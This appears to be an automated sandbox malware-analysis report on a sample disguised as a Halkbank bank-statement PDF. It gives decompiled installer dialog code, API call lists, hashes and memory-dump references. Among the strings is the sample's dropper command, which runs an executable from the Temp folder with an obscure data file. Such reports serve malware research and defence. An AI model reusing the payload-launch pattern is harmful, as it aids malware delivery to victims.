
                                                      APIs
                                                      • FindFirstFileW.KERNEL32(00000000,?,00000002), ref: 0040291A
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: FileFindFirst
                                                      • String ID:
                                                      • API String ID: 1974802433-0
                                                      • Opcode ID: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                      • Instruction ID: b84bdfeecc4e8c0803ac0e71b8711fc90ef1d688bdc4be786e729a17b55638d3
                                                      • Opcode Fuzzy Hash: b2f27a8a5f9b700f187602bb898c1293859530a573ae52e9df8ecc114fa703e5
                                                      • Instruction Fuzzy Hash: 47F05E71A04105EBDB01DBB4EE49AAEB378EF14314F60457BE101F21D0E7B88E529B29
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00405031 Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 489windowmemoryCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 96%
                                                      			E00405031(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				long _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				signed char* _v32;
				int _v36;
				signed int _v44;
				int _v48;
				signed int* _v60;
				signed char* _v64;
				signed int _v68;
				long _v72;
				void* _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t198;
				intOrPtr _t201;
				long _t207;
				signed int _t211;
				signed int _t222;
				void* _t225;
				void* _t226;
				int _t232;
				long _t237;
				long _t238;
				signed int _t239;
				signed int _t245;
				signed int _t247;
				signed char _t248;
				signed char _t254;
				void* _t258;
				void* _t260;
				signed char* _t278;
				signed char _t279;
				long _t284;
				struct HWND__* _t291;
				signed int* _t292;
				int _t293;
				long _t294;
				signed int _t295;
				void* _t297;
				long _t298;
				int _t299;
				signed int _t300;
				signed int _t303;
				signed int _t311;
				signed char* _t319;
				int _t324;
				void* _t326;

				_t291 = _a4;
				_v12 = GetDlgItem(_t291, 0x3f9);
				_v8 = GetDlgItem(_t291, 0x408);
				_t326 = SendMessageW;
				_v24 =  *0x42a288;
				_v28 =  *0x42a270 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t301 = _a16;
					} else {
						_a12 = 0;
						_t301 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t301;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t301 + 4)) == 0x408) {
							if(( *0x42a279 & 0x00000002) != 0) {
								L41:
								if(_v16 != 0) {
									_t237 = _v16;
									if( *((intOrPtr*)(_t237 + 8)) == 0xfffffe3d) {
										SendMessageW(_v8, 0x419, 0,  *(_t237 + 0x5c));
									}
									_t238 = _v16;
									if( *((intOrPtr*)(_t238 + 8)) == 0xfffffe39) {
										_t301 = _v24;
										_t239 =  *(_t238 + 0x5c);
										if( *((intOrPtr*)(_t238 + 0xc)) != 2) {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) & 0xffffffdf;
										} else {
											 *(_t239 * 0x818 + _t301 + 8) =  *(_t239 * 0x818 + _t301 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t301 = 0 | _a8 != 0x00000413;
								_t245 = E00404F7F(_v8, _a8 != 0x413);
								_t295 = _t245;
								if(_t295 >= 0) {
									_t94 = _v24 + 8; // 0x8
									_t301 = _t245 * 0x818 + _t94;
									_t247 =  *_t301;
									if((_t247 & 0x00000010) == 0) {
										if((_t247 & 0x00000040) == 0) {
											_t248 = _t247 ^ 0x00000001;
										} else {
											_t254 = _t247 ^ 0x00000080;
											if(_t254 >= 0) {
												_t248 = _t254 & 0x000000fe;
											} else {
												_t248 = _t254 | 0x00000001;
											}
										}
										 *_t301 = _t248;
										E0040117D(_t295);
										_a12 = _t295 + 1;
										_a16 =  !( *0x42a278) >> 0x00000008 & 0x00000001;
										_a8 = 0x40f;
									}
								}
								goto L41;
							}
							_t301 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageW(_v8, 0x200, 0, 0);
							}
							if(_a8 == 0x40b) {
								_t225 =  *0x42372c;
								if(_t225 != 0) {
									ImageList_Destroy(_t225);
								}
								_t226 =  *0x423740;
								if(_t226 != 0) {
									GlobalFree(_t226);
								}
								 *0x42372c = 0;
								 *0x423740 = 0;
								 *0x42a2c0 = 0;
							}
							if(_a8 != 0x40f) {
								L90:
								if(_a8 == 0x420 && ( *0x42a279 & 0x00000001) != 0) {
									_t324 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t324);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t324);
								}
								goto L93;
							} else {
								E004011EF(_t301, 0, 0);
								_t198 = _a12;
								if(_t198 != 0) {
									if(_t198 != 0xffffffff) {
										_t198 = _t198 - 1;
									}
									_push(_t198);
									_push(8);
									E00404FFF();
								}
								if(_a16 == 0) {
									L75:
									E004011EF(_t301, 0, 0);
									_v36 =  *0x423740;
									_t201 =  *0x42a288;
									_v64 = 0xf030;
									_v24 = 0;
									if( *0x42a28c <= 0) {
										L86:
										if( *0x42a31e == 0x400) {
											InvalidateRect(_v8, 0, 1);
										}
										if( *((intOrPtr*)( *0x42923c + 0x10)) != 0) {
											E00404F3A(0x3ff, 0xfffffffb, E00404F52(5));
										}
										goto L90;
									}
									_t292 = _t201 + 8;
									do {
										_t207 =  *((intOrPtr*)(_v36 + _v24 * 4));
										if(_t207 != 0) {
											_t303 =  *_t292;
											_v72 = _t207;
											_v76 = 8;
											if((_t303 & 0x00000001) != 0) {
												_v76 = 9;
												_v60 =  &(_t292[4]);
												_t292[0] = _t292[0] & 0x000000fe;
											}
											if((_t303 & 0x00000040) == 0) {
												_t211 = (_t303 & 0x00000001) + 1;
												if((_t303 & 0x00000010) != 0) {
													_t211 = _t211 + 3;
												}
											} else {
												_t211 = 3;
											}
											_v68 = (_t211 << 0x0000000b | _t303 & 0x00000008) + (_t211 << 0x0000000b | _t303 & 0x00000008) | _t303 & 0x00000020;
											SendMessageW(_v8, 0x1102, (_t303 >> 0x00000005 & 0x00000001) + 1, _v72);
											SendMessageW(_v8, 0x113f, 0,  &_v76);
										}
										_v24 = _v24 + 1;
										_t292 =  &(_t292[0x206]);
									} while (_v24 <  *0x42a28c);
									goto L86;
								} else {
									_t293 = E004012E2( *0x423740);
									E00401299(_t293);
									_t222 = 0;
									_t301 = 0;
									if(_t293 <= 0) {
										L74:
										SendMessageW(_v12, 0x14e, _t301, 0);
										_a16 = _t293;
										_a8 = 0x420;
										goto L75;
									} else {
										goto L71;
									}
									do {
										L71:
										if( *((intOrPtr*)(_v28 + _t222 * 4)) != 0) {
											_t301 = _t301 + 1;
										}
										_t222 = _t222 + 1;
									} while (_t222 < _t293);
									goto L74;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L93;
						} else {
							_t232 = SendMessageW(_v12, 0x147, 0, 0);
							if(_t232 == 0xffffffff) {
								goto L93;
							}
							_t294 = SendMessageW(_v12, 0x150, _t232, 0);
							if(_t294 == 0xffffffff ||  *((intOrPtr*)(_v28 + _t294 * 4)) == 0) {
								_t294 = 0x20;
							}
							E00401299(_t294);
							SendMessageW(_a4, 0x420, 0, _t294);
							_a12 = _a12 | 0xffffffff;
							_a16 = 0;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					_v36 = 0;
					_v20 = 2;
					 *0x42a2c0 = _t291;
					 *0x423740 = GlobalAlloc(0x40,  *0x42a28c << 2);
					_t258 = LoadImageW( *0x42a260, 0x6e, 0, 0, 0, 0);
					 *0x423734 =  *0x423734 | 0xffffffff;
					_t297 = _t258;
					 *0x42373c = SetWindowLongW(_v8, 0xfffffffc, E0040563E);
					_t260 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x42372c = _t260;
					ImageList_AddMasked(_t260, _t297, 0xff00ff);
					SendMessageW(_v8, 0x1109, 2,  *0x42372c);
					if(SendMessageW(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageW(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_t297);
					_t298 = 0;
					do {
						_t266 =  *((intOrPtr*)(_v28 + _t298 * 4));
						if( *((intOrPtr*)(_v28 + _t298 * 4)) != 0) {
							if(_t298 != 0x20) {
								_v20 = 0;
							}
							SendMessageW(_v12, 0x151, SendMessageW(_v12, 0x143, 0, E004066A5(_t298, 0, _t326, 0, _t266)), _t298);
						}
						_t298 = _t298 + 1;
					} while (_t298 < 0x21);
					_t299 = _a16;
					_push( *((intOrPtr*)(_t299 + 0x30 + _v20 * 4)));
					_push(0x15);
					E004045C4(_a4);
					_push( *((intOrPtr*)(_t299 + 0x34 + _v20 * 4)));
					_push(0x16);
					E004045C4(_a4);
					_t300 = 0;
					_v16 = 0;
					if( *0x42a28c <= 0) {
						L19:
						SetWindowLongW(_v8, 0xfffffff0, GetWindowLongW(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t319 = _v24 + 8;
						_v32 = _t319;
						do {
							_t278 =  &(_t319[0x10]);
							if( *_t278 != 0) {
								_v64 = _t278;
								_t279 =  *_t319;
								_v88 = _v16;
								_t311 = 0x20;
								_v84 = 0xffff0002;
								_v80 = 0xd;
								_v68 = _t311;
								_v44 = _t300;
								_v72 = _t279 & _t311;
								if((_t279 & 0x00000002) == 0) {
									if((_t279 & 0x00000004) == 0) {
										 *( *0x423740 + _t300 * 4) = SendMessageW(_v8, 0x1132, 0,  &_v88);
									} else {
										_v16 = SendMessageW(_v8, 0x110a, 3, _v16);
									}
								} else {
									_v80 = 0x4d;
									_v48 = 1;
									_t284 = SendMessageW(_v8, 0x1132, 0,  &_v88);
									_v36 = 1;
									 *( *0x423740 + _t300 * 4) = _t284;
									_v16 =  *( *0x423740 + _t300 * 4);
								}
							}
							_t300 = _t300 + 1;
							_t319 =  &(_v32[0x818]);
							_v32 = _t319;
						} while (_t300 <  *0x42a28c);
						if(_v36 != 0) {
							L20:
							if(_v20 != 0) {
								E004045F9(_v8);
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E004045F9(_v12);
								L93:
								return E0040462B(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}


























































                                                      0x00405038
                                                      0x00405051
                                                      0x00405056
                                                      0x0040505e
                                                      0x00405064
                                                      0x0040507a
                                                      0x0040507d
                                                      0x004052a8
                                                      0x004052af
                                                      0x004052c3
                                                      0x004052b1
                                                      0x004052b3
                                                      0x004052b6
                                                      0x004052b7
                                                      0x004052be
                                                      0x004052be
                                                      0x004052cf
                                                      0x004052dd
                                                      0x004052e0
                                                      0x004052f6
                                                      0x0040536b
                                                      0x0040536e
                                                      0x00405370
                                                      0x0040537a
                                                      0x00405388
                                                      0x00405388
                                                      0x0040538a
                                                      0x00405394
                                                      0x0040539a
                                                      0x0040539d
                                                      0x004053a0
                                                      0x004053bb
                                                      0x004053a2
                                                      0x004053ac
                                                      0x004053ac
                                                      0x004053a0
                                                      0x00405394
                                                      0x00000000
                                                      0x0040536e
                                                      0x004052fb
                                                      0x00405306
                                                      0x0040530b
                                                      0x00405312
                                                      0x00405317
                                                      0x0040531b
                                                      0x00405326
                                                      0x00405326
                                                      0x0040532a
                                                      0x0040532e
                                                      0x00405332
                                                      0x00405345
                                                      0x00405334
                                                      0x00405334
                                                      0x0040533b
                                                      0x00405341
                                                      0x0040533d
                                                      0x0040533d
                                                      0x0040533d
                                                      0x0040533b
                                                      0x00405349
                                                      0x0040534b
                                                      0x0040535e
                                                      0x00405361
                                                      0x00405364
                                                      0x00405364
                                                      0x0040532e
                                                      0x00000000
                                                      0x0040531b
                                                      0x004052fd
                                                      0x00405304
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004053be
                                                      0x004053be
                                                      0x004053c5
                                                      0x00405436
                                                      0x0040543e
                                                      0x00405446
                                                      0x00405446
                                                      0x0040544f
                                                      0x00405451
                                                      0x00405458
                                                      0x0040545b
                                                      0x0040545b
                                                      0x00405461
                                                      0x00405468
                                                      0x0040546b
                                                      0x0040546b
                                                      0x00405471
                                                      0x00405477
                                                      0x0040547d
                                                      0x0040547d
                                                      0x0040548a
                                                      0x004055eb
                                                      0x004055f2
                                                      0x0040560f
                                                      0x00405615
                                                      0x00405627
                                                      0x00405627
                                                      0x00000000
                                                      0x00405490
                                                      0x00405492
                                                      0x00405497
                                                      0x0040549c
                                                      0x004054a1
                                                      0x004054a3
                                                      0x004054a3
                                                      0x004054a4
                                                      0x004054a5
                                                      0x004054a7
                                                      0x004054a7
                                                      0x004054af
                                                      0x004054f0
                                                      0x004054f2
                                                      0x00405502
                                                      0x00405505
                                                      0x0040550a
                                                      0x00405511
                                                      0x00405514
                                                      0x004055b6
                                                      0x004055bf
                                                      0x004055c7
                                                      0x004055c7
                                                      0x004055d5
                                                      0x004055e6
                                                      0x004055e6
                                                      0x00000000
                                                      0x004055d5
                                                      0x0040551a
                                                      0x0040551d
                                                      0x00405523
                                                      0x00405528
                                                      0x0040552a
                                                      0x0040552c
                                                      0x00405532
                                                      0x00405539
                                                      0x0040553e
                                                      0x00405545
                                                      0x00405548
                                                      0x00405548
                                                      0x0040554f
                                                      0x0040555b
                                                      0x0040555f
                                                      0x00405561
                                                      0x00405561
                                                      0x00405551
                                                      0x00405553
                                                      0x00405553
                                                      0x00405581
                                                      0x0040558d
                                                      0x0040559c
                                                      0x0040559c
                                                      0x0040559e
                                                      0x004055a1
                                                      0x004055aa
                                                      0x00000000
                                                      0x004054b1
                                                      0x004054bc
                                                      0x004054bf
                                                      0x004054c4
                                                      0x004054c6
                                                      0x004054ca
                                                      0x004054da
                                                      0x004054e4
                                                      0x004054e6
                                                      0x004054e9
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x004054cc
                                                      0x004054cc
                                                      0x004054d2
                                                      0x004054d4
                                                      0x004054d4
                                                      0x004054d5
                                                      0x004054d6
                                                      0x00000000
                                                      0x004054cc
                                                      0x004054af
                                                      0x0040548a
                                                      0x004053cd
                                                      0x00000000
                                                      0x004053e3
                                                      0x004053ed
                                                      0x004053f2
                                                      0x00000000
                                                      0x00000000
                                                      0x00405404
                                                      0x00405409
                                                      0x00405415
                                                      0x00405415
                                                      0x00405417
                                                      0x00405426
                                                      0x00405428
                                                      0x0040542c
                                                      0x0040542f
                                                      0x00000000
                                                      0x0040542f
                                                      0x004053cd
                                                      0x00405083
                                                      0x00405088
                                                      0x00405091
                                                      0x00405098
                                                      0x004050aa
                                                      0x004050b5
                                                      0x004050bb
                                                      0x004050c9
                                                      0x004050dd
                                                      0x004050e2
                                                      0x004050ef
                                                      0x004050f4
                                                      0x0040510a
                                                      0x0040511b
                                                      0x00405128
                                                      0x00405128
                                                      0x0040512b
                                                      0x00405131
                                                      0x00405133
                                                      0x00405136
                                                      0x0040513b
                                                      0x00405140
                                                      0x00405142
                                                      0x00405142
                                                      0x00405162
                                                      0x00405162
                                                      0x00405164
                                                      0x00405165
                                                      0x0040516a
                                                      0x00405170
                                                      0x00405174
                                                      0x00405179
                                                      0x00405181
                                                      0x00405185
                                                      0x0040518a
                                                      0x0040518f
                                                      0x00405197
                                                      0x0040519a
                                                      0x0040526a
                                                      0x0040527d
                                                      0x00000000
                                                      0x004051a0
                                                      0x004051a3
                                                      0x004051a6
                                                      0x004051a9
                                                      0x004051a9
                                                      0x004051af
                                                      0x004051b8
                                                      0x004051bb
                                                      0x004051bf
                                                      0x004051c2
                                                      0x004051c5
                                                      0x004051ce
                                                      0x004051d7
                                                      0x004051da
                                                      0x004051dd
                                                      0x004051e0
                                                      0x0040521e
                                                      0x00405249
                                                      0x00405220
                                                      0x0040522f
                                                      0x0040522f
                                                      0x004051e2
                                                      0x004051e5
                                                      0x004051f3
                                                      0x004051fd
                                                      0x00405205
                                                      0x0040520c
                                                      0x00405217
                                                      0x00405217
                                                      0x004051e0
                                                      0x0040524f
                                                      0x00405250
                                                      0x0040525c
                                                      0x0040525c
                                                      0x00405268
                                                      0x00405283
                                                      0x00405286
                                                      0x004052a3
                                                      0x00000000
                                                      0x00405288
                                                      0x0040528d
                                                      0x00405296
                                                      0x00405629
                                                      0x0040563b
                                                      0x0040563b
                                                      0x00405286
                                                      0x00000000
                                                      0x00405268
                                                      0x0040519a

                                                      APIs
                                                      • GetDlgItem.USER32 ref: 00405049
                                                      • GetDlgItem.USER32 ref: 00405054
                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 0040509E
                                                      • LoadImageW.USER32 ref: 004050B5
                                                      • SetWindowLongW.USER32 ref: 004050CE
                                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 004050E2
                                                      • ImageList_AddMasked.COMCTL32(00000000,00000000,00FF00FF), ref: 004050F4
                                                      • SendMessageW.USER32(?,00001109,00000002), ref: 0040510A
                                                      • SendMessageW.USER32(?,0000111C,00000000,00000000), ref: 00405116
                                                      • SendMessageW.USER32(?,0000111B,00000010,00000000), ref: 00405128
                                                      • DeleteObject.GDI32(00000000), ref: 0040512B
                                                      • SendMessageW.USER32(?,00000143,00000000,00000000), ref: 00405156
                                                      • SendMessageW.USER32(?,00000151,00000000,00000000), ref: 00405162
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 004051FD
                                                      • SendMessageW.USER32(?,0000110A,00000003,00000110), ref: 0040522D
                                                        • Part of subcall function 004045F9: SendMessageW.USER32(00000028,?,00000001,00404424), ref: 00404607
                                                      • SendMessageW.USER32(?,00001132,00000000,?), ref: 00405241
                                                      • GetWindowLongW.USER32(?,000000F0), ref: 0040526F
                                                      • SetWindowLongW.USER32 ref: 0040527D
                                                      • ShowWindow.USER32(?,00000005), ref: 0040528D
                                                      • SendMessageW.USER32(?,00000419,00000000,?), ref: 00405388
                                                      • SendMessageW.USER32(?,00000147,00000000,00000000), ref: 004053ED
                                                      • SendMessageW.USER32(?,00000150,00000000,00000000), ref: 00405402
                                                      • SendMessageW.USER32(?,00000420,00000000,00000020), ref: 00405426
                                                      • SendMessageW.USER32(?,00000200,00000000,00000000), ref: 00405446
                                                      • ImageList_Destroy.COMCTL32(?), ref: 0040545B
                                                      • GlobalFree.KERNEL32 ref: 0040546B
                                                      • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 004054E4
                                                      • SendMessageW.USER32(?,00001102,?,?), ref: 0040558D
                                                      • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 0040559C
                                                      • InvalidateRect.USER32(?,00000000,00000001), ref: 004055C7
                                                      • ShowWindow.USER32(?,00000000), ref: 00405615
                                                      • GetDlgItem.USER32 ref: 00405620
                                                      • ShowWindow.USER32(00000000), ref: 00405627
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313018431.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313027463.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                      • Associated: 00000000.00000002.313185127.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_Halkbank_Ekstre_20191102_073809_405251-PDF.jbxd
                                                      Similarity
                                                      • API ID: MessageSend$Window$Image$ItemList_LongShow$Global$AllocCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
                                                      • String ID: $M$N
                                                      • API String ID: 2564846305-813528018
                                                      • Opcode ID: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                      • Instruction ID: a1eb65f7683e17450fca8d4cb4c1055b074660be5b1b810df034ff690b7f681c
                                                      • Opcode Fuzzy Hash: de07a9e9a0be4199ac2fb0f6085adc1098bb242521470954e30eab12cbe79057
                                                      • Instruction Fuzzy Hash: 2A025CB0900609EFDF20DF65CD45AAE7BB5FB44315F10817AEA10BA2E1D7798A52CF18
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 00404783 Relevance: 37.0, APIs: 19, Strings: 2, Instructions: 204windowstringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 91%
                                                      			E00404783(struct HWND__* _a4, int _a8, unsigned int _a12, WCHAR* _a16) {
				intOrPtr _v8;
				int _v12;
				void* _v16;
				struct HWND__* _t56;
				signed int _t75;
				signed short* _t76;
				signed short* _t78;
				long _t92;
				int _t103;
				signed int _t110;
				intOrPtr _t113;
				WCHAR* _t114;
				signed int* _t116;
				WCHAR* _t117;
				struct HWND__* _t118;

				if(_a8 != 0x110) {
					if(_a8 != 0x111) {
						L13:
						if(_a8 != 0x4e) {
							if(_a8 == 0x40b) {
								 *0x421714 =  *0x421714 + 1;
							}
							L27:
							_t114 = _a16;
							L28:
							return E0040462B(_a8, _a12, _t114);
						}
						_t56 = GetDlgItem(_a4, 0x3e8);
						_t114 = _a16;
						if( *((intOrPtr*)(_t114 + 8)) == 0x70b &&  *((intOrPtr*)(_t114 + 0xc)) == 0x201) {
							_t103 =  *((intOrPtr*)(_t114 + 0x1c));
							_t113 =  *((intOrPtr*)(_t114 + 0x18));
							_v12 = _t103;
							_v16 = _t113;
							_v8 = 0x428200;
							if(_t103 - _t113 < 0x800) {
								SendMessageW(_t56, 0x44b, 0,  &_v16);
								SetCursor(LoadCursorW(0, 0x7f02));
								_push(1);
								E00404A32(_a4, _v8);
								SetCursor(LoadCursorW(0, 0x7f00));
								_t114 = _a16;
							}
						}
						if( *((intOrPtr*)(_t114 + 8)) != 0x700 ||  *((intOrPtr*)(_t114 + 0xc)) != 0x100) {
							goto L28;
						} else {
							if( *((intOrPtr*)(_t114 + 0x10)) == 0xd) {
								SendMessageW( *0x42a268, 0x111, 1, 0);
							}
							if( *((intOrPtr*)(_t114 + 0x10)) == 0x1b) {
								SendMessageW( *0x42a268, 0x10, 0, 0);
							}
							return 1;
						}
					}
					if(_a12 >> 0x10 != 0 ||  *0x421714 != 0) {
						goto L27;
					} else {
						_t116 =  *0x422720 + 0x14;
						if(( *_t116 & 0x00000020) == 0) {
							goto L27;
						}
						 *_t116 =  *_t116 & 0xfffffffe | SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001;
						E004045E6(SendMessageW(GetDlgItem(_a4, 0x40a), 0xf0, 0, 0) & 0x00000001);
						E00404A0E();
						goto L13;
					}
				}
				_t117 = _a16;
				_t75 =  *(_t117 + 0x30);
				if(_t75 < 0) {
					_t75 =  *( *0x42923c - 4 + _t75 * 4);
				}
				_t76 =  *0x42a298 + _t75 * 2;
				_t110 =  *_t76 & 0x0000ffff;
				_a8 = _t110;
				_t78 =  &(_t76[1]);
				_a16 = _t78;
				_v16 = _t78;
				_v12 = 0;
				_v8 = E00404734;
				if(_t110 != 2) {
					_v8 = E004046FA;
				}
				_push( *((intOrPtr*)(_t117 + 0x34)));
				_push(0x22);
				E004045C4(_a4);
				_push( *((intOrPtr*)(_t117 + 0x38)));
				_push(0x23);
				E004045C4(_a4);
				CheckDlgButton(_a4, (0 | ( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001) == 0x00000000) + 0x40a, 1);
				E004045E6( !( *(_t117 + 0x14)) >> 0x00000005 & 0x00000001 |  *(_t117 + 0x14) & 0x00000001);
				_t118 = GetDlgItem(_a4, 0x3e8);
				E004045F9(_t118);
				SendMessageW(_t118, 0x45b, 1, 0);
				_t92 =  *( *0x42a270 + 0x68);
				if(_t92 < 0) {
					_t92 = GetSysColor( ~_t92);
				}
				SendMessageW(_t118, 0x443, 0, _t92);
				SendMessageW(_t118, 0x445, 0, 0x4010000);
				SendMessageW(_t118, 0x435, 0, lstrlenW(_a16));
				 *0x421714 = 0;
				SendMessageW(_t118, 0x449, _a8,  &_v16);
				 *0x421714 = 0;
				return 0;
			}


















                                                      0x00404795
                                                      0x004048c2
                                                      0x0040491f
                                                      0x00404923
                                                      0x004049f0
                                                      0x004049f2
                                                      0x004049f2
                                                      0x004049f8
                                                      0x004049f8
                                                      0x004049fb
                                                      0x00000000
                                                      0x00404a02
                                                      0x00404931
                                                      0x00404937
                                                      0x00404941
                                                      0x0040494c
                                                      0x0040494f
                                                      0x00404952
                                                      0x0040495d
                                                      0x00404960
                                                      0x00404967
                                                      0x00404974
                                                      0x00404985
                                                      0x0040498b
                                                      0x00404993
                                                      0x004049a1
                                                      0x004049a7
                                                      0x004049a7
                                                      0x00404967
                                                      0x004049b1
                                                      0x00000000
                                                      0x004049bc
                                                      0x004049c0
                                                      0x004049d0
                                                      0x004049d0
                                                      0x004049d6
                                                      0x004049e2
                                                      0x004049e2
                                                      0x00000000
                                                      0x004049e6
                                                      0x004049b1
                                                      0x004048cd
                                                      0x00000000
                                                      0x004048df
                                                      0x004048e4
                                                      0x004048ea
                                                      0x00000000
                                                      0x00000000
                                                      0x00404913
                                                      0x00404915
                                                      0x0040491a
                                                      0x00000000
                                                      0x0040491a
                                                      0x004048cd
                                                      0x0040479b
                                                      0x0040479e
                                                      0x004047a3
                                                      0x004047b4
                                                      0x004047b4
                                                      0x004047bc
                                                      0x004047bf
                                                      0x004047c3
                                                      0x004047c6
                                                      0x004047ca
                                                      0x004047cd
                                                      0x004047d0
                                                      0x004047d3
                                                      0x004047da
                                                      0x004047dc
                                                      0x004047dc
                                                      0x004047e6
                                                      0x004047f3
                                                      0x004047fd
                                                      0x00404802
                                                      0x00404805
                                                      0x0040480a
                                                      0x00404821
                                                      0x00404828
                                                      0x0040483b
                                                      0x0040483e
                                                      0x00404852
                                                      0x00404859
                                                      0x0040485e
                                                      0x00404863
                                                      0x00404863
                                                      0x00404871
                                                      0x0040487f
                                                      0x00404891
                                                      0x00404896
                                                      0x004048a6
                                                      0x004048a8
                                                      0x00000000

                                                      APIs
                                                      • CheckDlgButton.USER32 ref: 00404821
                                                      • GetDlgItem.USER32 ref: 00404835
                                                      • SendMessageW.USER32(00000000,0000045B,00000001,00000000), ref: 00404852
                                                      • GetSysColor.USER32(?), ref: 00404863
                                                      • SendMessageW.USER32(00000000,00000443,00000000,?), ref: 00404871
                                                      • SendMessageW.USER32(00000000,00000445,00000000,04010000), ref: 0040487F
                                                      • lstrlenW.KERNEL32(?), ref: 00404884
                                                      • SendMessageW.USER32(00000000,00000435,00000000,00000000), ref: 00404891
                                                      • SendMessageW.USER32(00000000,00000449,00000110,00000110), ref: 004048A6
                                                      • GetDlgItem.USER32 ref: 004048FF
                                                      • SendMessageW.USER32(00000000), ref: 00404906
                                                      • GetDlgItem.USER32 ref: 00404931
                                                      • SendMessageW.USER32(00000000,0000044B,00000000,00000201), ref: 00404974
                                                      • LoadCursorW.USER32(00000000,00007F02), ref: 00404982
                                                      • SetCursor.USER32(00000000), ref: 00404985
                                                      • LoadCursorW.USER32(00000000,00007F00), ref: 0040499E
                                                      • SetCursor.USER32(00000000), ref: 004049A1
                                                      • SendMessageW.USER32(00000111,00000001,00000000), ref: 004049D0
                                                      • SendMessageW.USER32(00000010,00000000,00000000), ref: 004049E2
                                                      Strings
                                                      • "C:\Users\user\AppData\Local\Temp\vokkqsp.exe" C:\Users\user\AppData\Local\Temp\kxgycvzd.lwf, xrefs: 00404960
                                                      • N, xrefs: 0040491F
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.313010361.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000000.00000002.313005023.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
